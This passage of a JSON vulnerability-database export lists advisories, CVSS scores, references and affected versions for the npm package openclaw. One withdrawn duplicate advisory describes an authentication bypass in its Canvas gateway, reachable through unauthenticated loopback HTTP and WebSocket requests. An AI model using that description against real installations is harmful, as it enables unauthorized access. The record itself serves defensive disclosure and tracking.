                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-32846",
                "GHSA-hggm-x7r9-mm7v"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8uzb-xmf8-hbca"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89569?format=api",
            "vulnerability_id": "VCID-8z7r-a8dv-eueb",
            "summary": "Duplicate Advisory: OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6mqc-jqh6-x8fc. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains an authentication bypass vulnerability in the Canvas gateway where authorizeCanvasRequest() unconditionally allows local-direct requests without validating bearer tokens or canvas capabilities. Attackers can send unauthenticated loopback HTTP and WebSocket requests to Canvas routes to bypass authentication and gain unauthorized access.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9gvx-vj57-vqqx",
                    "reference_id": "GHSA-9gvx-vj57-vqqx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9gvx-vj57-vqqx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.23",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"
                }
            ],
            "aliases": [
                "GHSA-9gvx-vj57-vqqx"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8z7r-a8dv-eueb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89861?format=api",
            "vulnerability_id": "VCID-96jd-x87b-s3ey",
